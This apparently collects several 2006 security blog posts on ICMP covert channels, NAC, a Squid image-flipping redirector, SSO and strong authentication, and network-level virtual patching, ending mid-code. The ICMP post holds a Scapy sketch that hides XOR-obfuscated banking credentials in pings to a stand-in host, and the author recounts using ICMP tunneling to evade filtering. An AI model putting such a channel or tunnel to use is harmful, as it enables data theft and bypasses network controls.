ICMP = Internet Compromise Malware Protocol…the end is near!

August 9th, 2006 5 comments

Bear with me here as I admire the sheer elegance and simplicity of what this latest piece of malware uses as its covert back channel: ICMP.  I know…nothing fancy, but that’s why I think its simplicity underscores the bigger problem we have in securing this messy mash-up of Internet connected chewy goodness.

When you think about it, even the dopiest of users knows that when they experience some sort of abnormal network access issue, they can just open their DOS (pun intended) command prompt and type "ping…" and then call the helpdesk when they don’t get the obligatory ‘pong’ response.

It’s a really useful little protocol. Good for all sorts of things like out-of-band notifications for network connectivity, unreachable services and even quenching of overly-anxious network hosts. 

Network/security admins like it because it makes troubleshooting easy and it actually forms some of the glue and crutches that folks depend upon (unfortunately) to keep their networks running…

It’s had its fair share of negative press, sure. But who amongst us hasn’t?  I mean, Smurfs are cute and cuddly, so how can you blame poor old ICMP for merely transporting them?  Ping of Death?  That’s just not nice!  Nuke Attacks!?  Floods!?

Really, now.  Aren’t we being a bit harsh?  Consider the utility of it all…here’s a great example:

When I used to go onsite for customer engagements, my webmail access/POP-3/IMAP and SMTP access was filtered. Outbound SSH and other types of port filtering were also usually blocked, but my old friend ICMP was always there for me…so I tunneled my mail over ICMP using Loki and it worked great…and it always worked because ICMP was ALWAYS open.  Now, today’s IDS/IPS combos usually detect these sorts of tunneling activities, so some of the fun is over.

The annoying thing is that there is really no reason why the entire range of ICMP types needs to be open, and it’s not that difficult to mitigate the risk, but people don’t because they officially belong to the LBNaSOAC (Lazy Bastard Network and Security Operators and Administrators Consortium.)

However, back to the topic @ hand.  I was admiring the simplicity of this newly-found data-stealer trojan that installs itself as an Internet Exploder (IE) browser helper and ultimately captures keystrokes and screen images when accessing certain banking sites and communicates back to the criminal operators using ICMP and a basic XOR encryption scheme.  You can read about it here.
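
Just to illustrate how little machinery this takes, here’s a toy sketch in Python/Scapy of stuffing XOR-obfuscated data into echo requests.  The key, payload and destination are all made up for illustration; this is emphatically not the actual trojan’s scheme (read the write-up for that), just a feel for why ICMP makes such a comfy back channel:

# Toy illustration of an ICMP covert channel with a single-byte XOR "cipher".
# The key, the payload layout and the destination address are all hypothetical;
# this is NOT the trojan's actual protocol, just a sketch of how little it takes.
from scapy.all import IP, ICMP, Raw

XOR_KEY = 0x5A  # made-up key

def xor(data, key=XOR_KEY):
    return bytes(b ^ key for b in data)

def build_exfil_packet(stolen, dst="198.51.100.7"):
    # Hide the XOR-obfuscated data inside an ordinary-looking echo request.
    return IP(dst=dst) / ICMP(type=8) / Raw(load=xor(stolen))

def recover(pkt):
    # What the operator (or an IDS that knows the key) does on receipt.
    return xor(bytes(pkt[Raw].load))

if __name__ == "__main__":
    pkt = build_exfil_packet(b"acct=12345;pin=6789")
    print(recover(pkt))  # b'acct=12345;pin=6789'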

It’s a cool design.  Right, wrong or indifferent, you have to admire the creativity and ubiquity of the back channel…until, of course, you are compromised.

There are so many opportunities for creative abuse of taken-for-granted infrastructure and supporting communication protocols that this is going to be one hairy, protracted battle.

Submit your vote for the most "clever" use of common protocols/applications for this sort of thing…

Chris

NAC Attack: Why NAC doesn’t work and SN(i)F doesn’t, either…alone

August 7th, 2006 12 comments

I have to admit that when I read Alan Shimel’s blog entry whereby he calls out Richard Stiennon on his blog entries titled "Don’t Bother with NAC" and "Network Admission Control is a Blind Alley," I started licking my chops as I couldn’t wait to jump in and take some time to throw fuel on the fire.  Of course, Mike Rothman already did that, but my goal in life is to be more inflammatory than he is, so let the dousing begin!

I’ve actually been meaning to ask for clarification on some points from both of these fellas, so no better time than the present. 

Now, given the fact that I know all of the usual suspects in this debate, it’s odd that I’m actually not siding with any of them.  In fact, I sit squarely in the middle because I think that in the same breath both Richard and Alan are as wrong as they are right.  Mike is always right (in his own mind) but rather than suggest there was a KO here, let’s review the tape and analyze the count before we go to the scorecards for a decision.

This bout is under the jurisdiction of and sanctioned by the Nevada Gaming Commission and brought to you by FUD — the official supplier of facts on the Internet. 😉

Tale of the tape:

Richard Stiennon:

  1. Richard Stiennon highlighted some of Ofir Arkin’s NAC "weaknesses" presented at Black Hat and suggests that NAC is a waste of time based upon not only these technical deficiencies but also that the problems that NAC seeks to solve are already ameliorated by proper patching as machines "…that are patched do not get infected."
  2. Somewhat confusingly, he follows on from the previous statement with the claim that "The fear of the zero-day worm or virus has proved ungrounded. And besides, if it is zero-day, then having the latest DAT file from Symantec does you no good."
  3. Richard suggests that integrating host-based and network-based security is a bad idea and that the right thing to do is based upon "de-coupling network and host-based security. Rather than require them to work together let them work alone."
  4. Ultimately he expects that the rest of the problems will be fixed with a paradigm which he has called Secure Network Fabric. 
  5. Richard says the right solution is the concept he calls "Secure Network Fabric (SNF)" wherein "…network security solutions will not require switches, routers, laptops, servers, and vendors to work in concert with each other" but rather "…relies most heavily on a switched network architecture [which] usually involve[s] core switches as well as access switches."
  6. SNF relies on the VLANs that "…would be used to provide granularity down to the device-level where needed. The switch enforces policy based on layer 2 and 3 information. It is directed by the NetFlow based behavior monitoring system."
  7. Richard has talked about the need for integrating intelligent IDP (Intrusion Detection and Prevention) systems coupled with NBA/NBAD (Network Behavioral Analysis/Network Behavioral Anomaly Detection) and switching fabric for quite some time and this integration is key in SNF functionality.
  8. Furthermore, Richard maintains that relying on the endpoint to report its health back to the network and the mechanisms designed to allow admission is a bad idea and unnecessary.
  9. Richard maintains that there is a difference between "Admission Control" and "Access Control" and sums it up thusly: "To keep it simple just remember: Access Control, good. Admission Control, bad."

Alan Shimel:

  1. Alan freely admits that there are some technical "issues" with NAC such as implementation concerns with DHCP, static IP addresses, spoofed MAC addresses, NAT, etc.
  2. Alan points out that Richard did not mention that Ofir Arkin also suggests that utilizing a NAC solution based upon 802.1x is actually a robust solution.
  3. Alan alludes to the fact that people deploy NAC for various reasons and (quoting from a prior article) "…an important point is that NAC is not really geared towards stopping the determined hacker, but rather the inadvertent polluter."  Hence I believe he’s saying that 802.1x is the right NAC solution to use if you can as it solves both problems, but that if the latter is not your reason for deploying NAC, then the other issues are not as important.
  4. Alan points to the fact that many of Richard’s references are quite dated (such as the comments describing the 2003 acquisition of TippingPoint by 3Com as "recent") and that ultimately SNF is a soapbox upon which Richard can preach his dislike of NAC based upon "…trusting the endpoint to report its health."
  5. De-coupling network and host-based endpoint security is a bad idea, according to Alan, because you miss context and introduce/reinforce the information silos that exist today rather than allow for coordinated, consolidated and correlated security decisions to be made.
  6. Alan wishes to purchase Pot (unless it’s something better) from Richard and go for a long walk on the shore because Mr. Stiennon has "the good stuff" in his opinion since Richard intimates that patching and configuration management have worked well and that zero-day attacks are a non-entity.
  7. Alan suggests that the technology "…we used to call behavior based IPS’s" which will pass "…to the switch to enforce policy" is ultimately "another failed technology" and that the vendors Richard cites in his BAIPS example (Arbor, Mazu, etc.) are all "…struggling in search of a solution for the technology they have developed."
  8. Alan maintains that the SNF "dream" lacks the ability to deliver any time soon because by de-coupling host and network security, you are hamstrung by the lack of "…context, analytics and network performance."
  9. Finally, Alan is unclear on the difference between Network Access Control (good) and Network Admission Control (bad.)

So again, I maintain that they are both right and both wrong.  I am the Switzerland of NAC/SNF! 

I’ll tell you why — not in any particular order or with a particular slant…

(the bout has now turned from a boxing contest to a three man Mixed-Martial-Arts Octagon cage-match!  I predict a first round submission via tap-out):

  1. Firstly, endpoint and network security MUST be deployed together and communicate with one another to ultimately effect the most visible, transparent, collaborative and robust defense-in-depth security strategy available.  Nobody said it’s a 50/50 percentage, but having one without the other is silly.  There are things on endpoints that you can’t discover over a network.  Not having some intelligence about the endpoint means the network cannot possibly determine as accurately the "intent" of the packets spewing from it.
  2. Network Admission Control solutions don’t necessarily blindly trust the endpoint — whether agent or agentless, the NAC controller takes not only what the host "reports" but also how it "responds" to active probes of its state.  While virtualization and covert rootkits have the capability to potentially hide from these probes, suggesting that an endpoint passes these tests does not mean that the endpoint is no longer subject to any other control on the network…
  3. Once Network Admission Control is accomplished, Network Access Control can be applied (continuously) based upon policy and behavioral analysis/behavioral anomaly detection.
  4. Patching doesn’t work — not because the verb is dysfunctional — but because the people who are responsible for implementing it are.  So long as these systems are not completely automated, we’re at risk.
  5. Zero day exploits are not overblown — they’re getting more surgically targeted and the remediation cycles are too long.  Network-based solutions alone cannot protect against anomalies that are not protocol or exploit/vulnerability signature driven…if the traffic patterns are not abnormal, the flags are OK and the content seemingly benign going to something "normal," it *will* hit the target.
  6. You’ll be surprised just how immature many of the largest networks on this planet are in terms of segmentation via VLANs and internal security…FLAT, FLAT, FLAT.  Scary stuff.  If you think the network "understands" the data that is transported over it or can magically determine what is more important by asset/risk relevance, I too would like some of that stuff you’re smoking.
  7. Relying on the SNF concept wherein the "switch enforces policy based on layer 2 and 3 information," and "is directed by the NetFlow based behavior monitoring system" is wholly shortsighted.  Firstly, layer 2/3 information is incredibly limited since most of the attacks today are application-level attacks and NOT L2/L3, and NetFlow data (even v9) is grossly coarse and doesn’t provide the context needed to effectively determine these sorts of incursions.  That’s why NetFlow today is mostly used in DDoS activities — because you see egregiously spiked usage and/or traffic patterns.  It’s a colander not a sieve.  (See the NetFlow sketch after this list for just how little a flow record actually carries.)
  8. Most vendors today are indeed combining IDP functionality with NBA/D to give a much deeper and contextual awareness across the network.  More importantly, big players such as ISS and Cisco include endpoint security and NAC (both "versions") to more granularly define, isolate and ameliorate attacks.  It’s not perfect, but it’s getting better.
  9. Advances in BA/NBA/NBAD are coming (they’re here, actually) and they will produce profound new ways of managing context and actionable intelligence when combined with optimized compute and forwarding engines which are emerging at the same time.  They will begin, when paired with network-wide correlation tools, to solve the holy trinity of issues: context, analytics and performance.
  10. Furthermore, companies such as ISS and StillSecure (Alan’s company) have partnered with switch vendors to actually do just what Richard suggests in concept.  Interestingly enough, despite the new moniker, the SNF concept is not new — Cisco’s SDN (albeit without NAC) heavily leverages the concepts described above from an embedded security perspective and overlay security vendors such as ISS and Crossbeam also have solutions (in POC or available) in this area.
  11. Let’s be honest, just like the BA vendors Alan described, NAC is in just the same position — "struggling in search of a solution for the technology they have developed."  There are many reasons for deploying NAC: Pre- and Post-inspection/Quarantine/Remediation, and there are numerous ways of doing it: agent-based/agentless/in-line/out-of-band… The scary thing is with so many vendors jumping in here and the 800 pound Gorilla (Cisco) even having trouble figuring it out, how long before NAC becomes a feature and not a market?  Spending a bunch of money on a solution (even without potential forklifts) to not "… stop the determined hacker, but rather the inadvertent polluter" seems a little odd to me.  Sure it’s part of a well defined network strategy, but it ain’t all that yet, either.
  12. With Cisco’s CSO saying things like "The concept of having devices join a network in which they are posture-assessed and given access to the network in a granular way is still in its infancy" and even StillSecure’s CTO (Mitchell Ashley) saying "…but I think those interested in NAC today are really trying to avoid infection spread by an unsuspecting network user rather than a knowledgeable intruder" it’s difficult to see how NAC can be considered a core element of a network security strategy WITHOUT something like SNF.
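
To put a finer point on item 7 above: a NetFlow v5 flow record is 48 bytes of addresses, ports, counters and TCP flags, and that’s it.  Here’s a quick parsing sketch (based on Cisco’s published v5 record layout; the surrounding collector plumbing is hand-waved) showing everything a NetFlow-directed "behavior monitoring system" actually has to work with:

# NetFlow v5 exports one 48-byte record per flow: addresses, ports, counters
# and TCP flags. No payload, no URLs, no application context whatsoever.
import struct
from collections import namedtuple

V5Record = namedtuple("V5Record",
    "srcaddr dstaddr nexthop input output packets octets first last "
    "srcport dstport tcp_flags prot tos src_as dst_as src_mask dst_mask")

# Cisco's documented v5 record layout (follows the 24-byte export header).
_FMT = "!4s4s4sHHIIIIHHxBBBHHBBxx"   # exactly 48 bytes

def parse_v5_records(payload, count):
    # Yield flow records from the body of a v5 export datagram (header stripped).
    size = struct.calcsize(_FMT)     # == 48
    for i in range(count):
        yield V5Record(*struct.unpack_from(_FMT, payload, i * size))

# The fields above are the *entire* vocabulary available for "enforcing policy
# based on layer 2 and 3 information" -- fine for spotting a DDoS-sized spike,
# useless for deciding whether an allowed HTTP flow carried an exploit.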

So, they’re both right and both wrong.  Oh, and by the way, Enterprise and Provider-class UTM solutions are combining ALL of this in a unified security service layer… FW, IDP, Anti-X, NBA(D) and SNF-like foundations.

[Tap before it breaks, boys!]

We need NAC and we need SNF and I’ve got the answer:

  1. Take some of Richard’s "good stuff"
  2. Puff, puff, pass
  3. Combine some of Alan’s NAC with Richard’s SNF
  4. Stir
  5. Bake for 30 minutes and you have one F’N (good) SNAC (it’s an anagram, get it!)

There you have it.

Chris

The Most Hysterical “Security by Obscurity” Example, Evah!

August 4th, 2006 No comments

For those of you living under a rock for the last 15+ years, you may not have heard of Bruce Schneier.  He’s a brilliantly opinionated cryptographer, privacy advocate, security researcher, businessman, author and inadvertent mentor to many.  I don’t agree with everything he says, but I like the buttons he pushes.

I love reading his blog because his coverage of the issues today is diverse and profound and very much carries forth the flavor of his convictions.  Also, it seems Bruce really likes Squids…which makes this electronically-enabled Cephalopod-inspired security post regarding the theft of someone’s wireless connection that much more funny.

Here’s the gist: A guy finds that his neighbor is "stealing" his wireless Internet access.  Rather than just secure it, he "…runs squid with a trivial redirector that downloads images, uses mogrify to turn them upside down and serves them out of its local webserver."  Talk about security by obscurity!

That’s just f’in funny…so much so, I’m going to copy his idea, just like I did Bruce’s blog entry! 😉

Actually the best part is the comment from one "Matthew Skala" who performs an autopsy on the clearly insecure and potentially dangerous implementation of the scripts and potential for "…interesting results."  He’s just sayin’…

I don’t know all the details of how Squid interfaces to redirection scripts, but I see that that redirection script passes the URL to wget via a command line parameter without using "--" to terminate option processing. It first parses out what’s supposed to be the URL using a regular expression, but not a very cautious one. I wonder if it might be possible to request a carefully-designed URL that would cause wget to misbehave by interpreting the URL as an option instead of a URL. I also see that it’s recognizing images solely by filename, so I wonder if requesting a URL named like an image but that *wasn’t* an image, could cause interesting results. Furthermore, it writes the images to disk before flipping them – and I don’t even see any provision for clearing out the cache of flipped images – so requesting a lot of very large images, or images someone wouldn’t want to be caught possessing, might be interesting.

Posted by: Matthew Skala  at August  4, 2006 08:42 AM

Read the whole thing (with configs.) here.
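
And since I said I’m going to copy the idea, here’s roughly how I’d do the redirector while taking Matthew’s points to heart: pass "--" so a hostile URL can’t turn into a wget option, check the content type instead of trusting the filename, and cap the cache.  The paths, the served URL and the one-request-per-line convention are my assumptions from the classic Squid redirector behavior, so treat this as a sketch, not gospel:

#!/usr/bin/env python3
# Sketch of a Squid redirector in the upside-down-ternet spirit, with the holes
# Matthew calls out papered over: argument lists instead of shell interpolation,
# "--" so a hostile URL can't become a wget option, a content-type check instead
# of trusting the filename, and a crude cap on the flipped-image cache.
# Paths, the served URL and the one-request-per-line convention are assumptions.
import hashlib, os, subprocess, sys

CACHE_DIR = "/var/www/flipped"          # assumed to exist and be web-served
LOCAL_URL = "http://192.168.0.1/flipped"
MAX_CACHED = 200                        # don't let the neighbor fill the disk

def flip(url):
    name = hashlib.sha1(url.encode()).hexdigest() + ".img"
    out = os.path.join(CACHE_DIR, name)
    if not os.path.exists(out):
        if len(os.listdir(CACHE_DIR)) > MAX_CACHED:
            return None                                   # punt, serve original
        if subprocess.call(["wget", "-q", "-O", out, "--", url]) != 0:
            return None
        mime = subprocess.run(["file", "-b", "--mime-type", out],
                              capture_output=True, text=True).stdout.strip()
        if not mime.startswith("image/"):                 # name != content
            os.remove(out)
            return None
        subprocess.call(["mogrify", "-flip", out])        # flip in place
    return LOCAL_URL + "/" + name

for line in sys.stdin:                   # "URL ip/fqdn ident method" per request
    if not line.strip():
        continue
    url = line.split()[0]
    new = flip(url) if url.lower().endswith((".jpg", ".jpeg", ".png", ".gif")) else None
    sys.stdout.write((new or "") + "\n")  # blank line tells Squid to leave it alone
    sys.stdout.flush()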

Chris


More debate on SSO/Authentication

August 2nd, 2006 1 comment

Mike Farnum and I continue to debate the merits of single-sign-on and his opinion that deploying same makes you more secure. 

Rothman’s stirring the pot, saying this is a cat fight.  To me, it’s just two dudes having a reasonable debate…unless you know something I don’t [but thanks, Mike R., because nobody would ever read my crap unless you linked to it! ;)]

Mike’s position is that SSO does make you more secure and when combined with multi-factor authentication adds to defense-in-depth.   

It’s the first part I have a problem with, not so much the second, and I figured out why.  It’s the order of things that bugged me when Mike said the following:

But here’s s [a] caveat, no matter which way you go: you really need a single-signon solution backing up a multi-factor authentication implementation.

If he had suggested that multi-factor authentication should back up an SSO solution, I’d agree.  But he didn’t, and he continues not to by maintaining (I think) that SSO itself is secure and SSO + multi-factor authentication is more secure.

My opinion is a little different.  I believe that strong authentication *does* add to defense-in-depth, but SSO adds only depth of complexity, obfuscation and more moving parts, but with a single password on the front end.  More on that in a minute.

Let me clarify a point which is that I think from a BUSINESS and USER EXPERIENCE perspective, SSO is a fantastic idea.  However, I still maintain that SSO by itself does not add to defense-in-depth (just the opposite, actually) and does not, quantifiably, make you more "secure."  SSO is about convenience, ease of use and streamlined efficiency.

You may cut down on password resets, sure.  If someone locks themselves out, however, most of the time resets/unlocks then involve self-service portals or telephone resets which are just as prone to brute force and social engineering as calling the helpdesk, but that’s a generalization and I would rather argue through analogy… 😉

Here’s the sticky part of why I think SSO does not make you more secure: it merely transfers the risks involved with passwords from one compartment to the next.

While that’s a valid option, it is *very* important to recognize that managing risk does not, by definition, make you more secure…sometimes managing risk means you accept or transfer it.  It doesn’t mean you’ve solved the problem, just acknowledged it and chosen to accept the fact that the impact does not justify the cost involved in mitigating it. 😉

SSO just says "passwords are a pain in the ass to manage. I’m going to find a better solution for managing them that makes my life easier."  SSO Vendors claim it makes you more secure, but these systems can get very complex when implementing them across an Enterprise with 200 applications, multiple user repositories and the need to integrate or federate identities and it becomes difficult to quantify how much more secure you really are with all of these moving parts.

Again, SSO adds depth (of complexity, obfuscation and more moving parts) but with a single password on the front end.  Complex passwords on the back-end managed by the SSO system don’t do you a damned bit of good when some monkey writes that single password that unlocks the entire enterprise down on a sticky note.

Let’s take the fancy "SSO" title out of the mix for a second and consider today’s Active Directory/LDAP proxy functions which more and more applications tie into.  This relies on a single password via your domain credentials to authenticate directly to an application.  This is a form of SSO, and the reality is that all we’re doing when adding on an SSO system is supporting web and legacy applications that can’t use AD and proxying that function through SSO.

It’s the same problem all over again except now you’ve just got an uber:proxy.
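
If you want to see the uber:proxy in the flesh, this is more or less what every "AD-integrated" app is doing under the hood.  The hostname, the domain and the choice of the ldap3 library are mine, purely for illustration:

# Minimal sketch of an application "doing SSO" by proxying authentication to
# Active Directory over LDAP. Hostname, domain and the ldap3 library choice
# are mine, purely for illustration.
from ldap3 import Server, Connection, NTLM
from ldap3.core.exceptions import LDAPBindError

def app_login(username, password):
    # One domain credential; every app wired this way accepts the same one.
    server = Server("ldaps://dc01.example.internal", use_ssl=True)
    try:
        conn = Connection(server,
                          user="EXAMPLE\\" + username,
                          password=password,
                          authentication=NTLM,
                          auto_bind=True)   # raises LDAPBindError on failure
        conn.unbind()
        return True
    except LDAPBindError:
        return False

# The convenience is real; so is the blast radius. Guess the one password on
# the sticky note and you are "signed on" to everything that trusts the directory.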

Now, if you separate SSO from the multi-factor/strong authentication argument, I will agree that strong authentication (not necessarily multi-factor — read George Ou’s blog) helps mitigate some of the password issue, but they are mutually exclusive.

Maybe we’re really saying the same thing, but I can’t tell.

Just to show how fair and balanced I am (ha!) I will let you know that prior to leaving my last employ, I was about to deploy an Enterprise-wide SSO solution.  The reason?  Convenience and cost.

Transference of risk from the AD password policies to the SSO vendor’s and transparency of process and metrics collection for justifying more heads.    It wasn’t going to make us any more secure, but would make the users and the helpdesk happy and let us go figure out how we were going to integrate strong authentication to make the damned thing secure.

Chris

On two-factor authentication and Single-Sign-On…

August 1st, 2006 2 comments

I’ve been following with some hand-wringing the on-going debates regarding the value of two-factor and strong authentication systems in addition to, or supplementing, traditional passwords.

I am very intent on seeing where the use cases that best fit strong authentication ultimately surface in the long term.  We’ve seen where they are used today, but I wonder if we, in the U.S., will ever be able to satisfy the privacy concerns raised by something like a smart-card-based national ID system to recognize the benefits of this technology. 

Today, we see multi-factor authentication utilized for:  Remote-access VPN, disk encryption, federated/authenticated/encrypted identity management and access control, the convergence of physical and logical/information security…

[Editor’s Note: George Ou from ZDNet just posted a really interesting article on his blog relating how banks are "…cheating their way to [FFIEC] web security guidelines" by just using multiple instances of "something the user knows" and passing it off as "multifactor authentication."  His argument regarding multi-factor (supplemental) vs. strong authentication is also very interesting.]

I’ve owned/implemented/sold/evaluated/purchased every kind of two-factor / extended-factor / strong authentication system you can think of:

  • Tokens
  • SMS Messaging back to phones
  • Turing/image fuzzing
  • Smart Cards
  • RFID
  • Proximity
  • Biometrics
  • Passmark-like systems

…and there’s very little consistency in how they are deployed, managed and maintained.  Those pesky little users always seemed to screw something up…and it usually involved losing something, washing something, flushing something or forgetting something.

The technology’s great, but like Chandler Howell says, there are a lot of issues that need reconsideration when it comes to their implementation that go well beyond what we think of today as simply the tenets of "strong" authentication and the models of trust we surround them with:

So here are some Real World goals I suggest we should be looking at.

  1. Improved authentication should focus on (cryptographically) strong Mutual Authentication, not just improved assertion of user Identity. This may mean shifts in protocols, it may mean new technology. Those are implementation details at this level.
  2. We need to break the relationship between location & security assumption, including authentication. Do we need to find a replacement for "somewhere you are?" And if so, is it another authentication factor?
  3. How does improved authentication get protection closer to the data? We’re still debating types of deadbolts for our screen door rather than answering this question.

All really good points, and ones that I think we’re just at the tip of discussing. 

Taking these first steps is an ugly and painful experience usually, and I’d say that the first footprints planted along this continuum do belong to the token authentication models of today.  They don’t work for every application and there’s a lack of cross-pollination when you use one vendor’s token solution and wish to authenticate across boundaries (this is what OATH tries to solve.)
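
For the curious, the interoperable bit OATH standardized (HOTP, RFC 4226) is a surprisingly small amount of math; the demo secret below is the RFC’s own test value, not anything you’d deploy:

# HOTP (RFC 4226): the event-based one-time-password algorithm OATH promotes so
# that tokens from different vendors can validate against the same back end.
import hashlib
import hmac
import struct

def hotp(secret, counter, digits=6):
    # HMAC-SHA1 over the counter, dynamic truncation, then mod 10^digits.
    msg = struct.pack(">Q", counter)                  # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # low nibble picks the window
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

# Demo secret straight from the RFC's test vectors; counter 0 yields "755224".
print(hotp(b"12345678901234567890", 0))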

For some reason, people tend to evaluate solutions and technology in a very discrete and binary modality: either it’s the "end-all, be-all, silver bullet" or it’s a complete failure.  It’s quite an odd assertion really, but I suppose folks always try to corral security into absolutes instead of relativity.

That explains a lot.

At any rate, there’s no reason to re-hash the fact that passwords suck and that two-factor authentication can provide challenges, because I’m not going to add any value there.  We all understand the problem.  It’s incomplete and it’s not the only answer. 

Defense in depth (or should it be wide and narrow?) is important and any DID strategy of today includes the use of some form of strong authentication — from the bowels of the Enterprise to the eCommerce applications used in finance — driven by perceived market need, "better security," regulations, or enhanced privacy.

However, I did read something on Michael Farnum’s blog here that disturbed me a little.  In his blog, Michael discusses the pros/cons of passwords and two-factor authentication and goes on to introduce another element in the Identity Management, Authentication and Access Control space: Single-Sign-On.

Michael states:

But here’s s [a] caveat, no matter which way you go: you really need a single-signon solution backing up a multi-factor authentication implementation.  This scenario seems to make a lot of sense for a few reasons:

  • It eases the administrative burdens for the IT department because, if implemented correctly, your password reset burden should go down to almost nil
  • It eases (possibly almost eliminates) password complaints and written down passwords
  • It has the bonus of actually easing the login process to the network and the applications

I know it is not the end-all-be-all, but multi-factor authentication is definitely a strong layer in your defenses.  Think about it.

Okay, so I’ve thought about it and playing Devil’s Advocate, I have concluded that my answer is: "Why?"

How does Single-Sign-On contribute to defense-in-depth (besides adding another hyphenated industry slang term) short of lending itself to convenience for the user and the help desk?  Security is usually 1/convenience, so by that algorithm it doesn’t.

Now instead of writing down 10 passwords, the users only need one sticky — they’ll write that one down too!

Does SSO make you more secure?  I’d argue that in fact it does not — not now that the user has a singular login to every resource on the network via one password. 

Yes, we can shore that up with a strong-authentication solution, and that’s a good idea, but I maintain that SA and SSO are mutually exclusive and not a must.  The complexity of these systems can be mind boggling, especially when you consider the types of privileges these mechanisms often require in order to reconcile this ubiquitous access.  It becomes another attack surface.

There’s a LOT of "kludging" that often goes on with these SSO systems in order to support web and legacy applications and in many cases, there’s no direct link between the SSO system, the authentication mechanism/database/directory and ultimately the control(s) protecting as close to the data as you can.

This cumbersome process still relies on the underlying OS functionality and some additional add-ons to mate the authentication piece with the access control piece with the encryption piece with the DRM piece…

Yet I digress.

I’d like to see the RISKS of SSO presented along with the benefits if we’re going to consider the realities of the scenario in terms of this discussion.

That being said, just because it’s not the "end-all-be-all" (what the hell is with all these hyphens!?) doesn’t mean it’s not helpful… 😉

Chris

 

Retrospect: The “Morning After Pill for Patch Tuesday”

August 1st, 2006 1 comment

I dredged this post up from my prior blog because I think it’s interesting and relevant today given the current state of vulnerability management and patching.  I wrote this entry almost a year ago on 9/15/05, and I thought I’d bring it back to life here.

The post describes an alternative to the frenzied activities of Patch Tuesday and dovetails with what has become the raging debate over third party patches.  That being said, I don’t think there’s any excuse for crappy code, but today’s realities mean that despite tools like firewalls (even application-level ones), NBAD, and IPS, we still have to patch — one way or another.

My motto is work smarter, not harder and I think Blue Lane’s product allows one to do just that.  It helps you manage risk by buying time — and in some cases by patching what is otherwise unpatchable.

I want to bring to light an issue that was raised by Mike Rothman: is the "patch proxy" concept fab or fad?  Market or function?  One could argue that ultimately IPS vendors will provide this functionality in their products.  However, today, IPS products do one of two things:  Allow or Drop. 

I’m not going to argue the "market or function" question, because that’s not the point of this post.

Blue Lane’s PatchPoint provides in-stream remediation at the network layer — the same remediation you’d get on the actual host but without having to touch it until you’ve regression tested the box.  So the product isn’t solely "Intrusion Detection" nor is it solely "Intrusion Prevention" — I like to call it "Intrusion Correction."

When I wrote this, I was one of Blue Lane’s first customers and their technology really proved itself quite well and worked very nicely as a L2 insertion with the rest of the layers of security we already had in place.  It allowed us to make rational decisions about how, when and why we patched so as not to incur more risk through hasty patching than the exploit itself might cause should it hit.

Unfortunately I can’t pull the comments section that went with it as I had a great exchange with Dominick White on why this wasn’t just like "…every other IPS product."  Honestly, in hindsight I would go back and clarify a few points, but perhaps the post in its original form will provoke just as many comments/questions as it did before.

Chris

September 15, 2005

About two years ago as I was malcontently slumped over another batch of vulnerabilities which required patches to remediate, it occurred to me that even in light of good vulnerability management tools to prioritize vulnerabilities and patching efforts as well as tools to deploy them, the fact that I had to do either in a short period of time, well, stunk.

Patch too early without proper regression testing and business impact analysis and you can blow an asset sky high. Downtime resulting from "Patches Gone Wild" can result in more risk than potentially not patching at all depending upon whether the exploit is in the wild and the criticality of the vulnerability.

It was then that a VC contact turned me on to a company (who at the time was still in stealth mode) – Blue Lane Technologies – who proposed a better way to patch.

Namely, instead of patching the servers reactively without testing, why not patch the "network" instead and apply the same countermeasures to the streams as the patches do to the servers?

Assuming all other things such as latency and resiliency are even, this would be an excellent foothold in the battle to actually patch less while still patching rationally! You would buy yourself the time to test and plan and THEN deploy the actual server patch on your own schedule.

Guess what?  It works.  Very well.

We started testing a couple of months ago and threw all sorts of nastiness at the solution. It sits in-line in front of servers (with NIC-card failover capabilities, thankyouverymuch) and works by applying ActiveFix patches to the network streams in real time. We took a test box behind the protected interface and had multiple VMWare instances of various Microsoft OS’s and applications running. We hit it with all sorts of fun VA scanners, exploit tools and the like. Of course, the "boxes" were owned. We especially liked toying with MetaSploit since it allowed us to really play with payloads.

We "applied" the
patches to the machine instances behind the PatchPoint Gateway. Zip.
Nada. We couldn’t exploit a damned thing. It was impressive.

"Ah,"
you say, "but any old NIPS/HIPS/AV/Firewall can do that!" Er, not so,
Sparky. The notion here is that rather than simply dump an entire
session, the actual active streams are "corrected" allowing good
traffic to flow while preventing "bad" traffic from getting through —
on a per flow basis. It doesn’t just send a RST and that $50M wire
transfer to /dev/null, it actually allows legitimate business traffic
to continue unimpeded.

The approach is alarmingly, well, so 20 years ago!  Remember application proxy firewalls?

Well, if you think about how an FTP proxy works, one defines which "good" commands may be executed and anything else is merely ignored. A user could connect via FTP and type "delete" to his heart’s content, but if "delete" was not allowed, the proxy would simply discard the requested command and never pass it on to the server. Your session was still up, you could continue to use FTP, you just could not "delete."

Makes sense, no?
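
In sketch form, the old-school proxy idea boils down to something like this.  The allow list and responses are arbitrary; it’s a toy illustration of command filtering, not production code:

# Toy FTP control-channel filter in the application-proxy spirit: commands on
# the allow list get passed to the real server, anything else is swallowed and
# politely refused while the session itself stays up. Not production code.
ALLOWED = {"USER", "PASS", "CWD", "PWD", "TYPE", "PASV", "PORT", "LIST", "RETR", "QUIT"}

def filter_command(line):
    # Returns (forward_to_server, response_if_blocked).
    verb = line.strip().split(" ", 1)[0].upper()
    if verb in ALLOWED:
        return True, ""
    # DELE to your heart's content; the server simply never sees it.
    return False, "502 Command not implemented.\r\n"

if __name__ == "__main__":
    for cmd in ("RETR report.pdf", "DELE report.pdf", "SITE EXEC rm -rf /"):
        forward, reply = filter_command(cmd)
        print(cmd, "->", "forward" if forward else "block: " + reply.strip())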

If, for example, Microsoft’s MS05-1,000,000 patch for, say, IIS was designed to remediate a buffer overflow vulnerability by truncating POSTs to 1024 bytes, then that’s exactly what Blue Lane’s PatchPoint would do. If it *does* (on the odd chance) do something nasty to your application, you can simply "un-apply" the patch, which takes about 10 seconds, and you’re in no worse shape than you were in the first place…
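
Reduced to the crudest possible sketch (my illustration of the general idea, not Blue Lane’s actual implementation), the flow-correction rule for that imaginary IIS patch might amount to little more than this, applied in-line to the stream instead of on the server:

# Illustration only: the "virtual patch" idea reduced to a stream-correction
# rule. An in-line device applying it rewrites the offending request in flight
# and lets the rest of the session continue, instead of dropping the connection.
MAX_POST_BODY = 1024   # the limit from the hypothetical MS05-1,000,000 example

def correct_http_request(raw):
    # Truncate oversized POST bodies; pass everything else through untouched.
    head, sep, body = raw.partition(b"\r\n\r\n")
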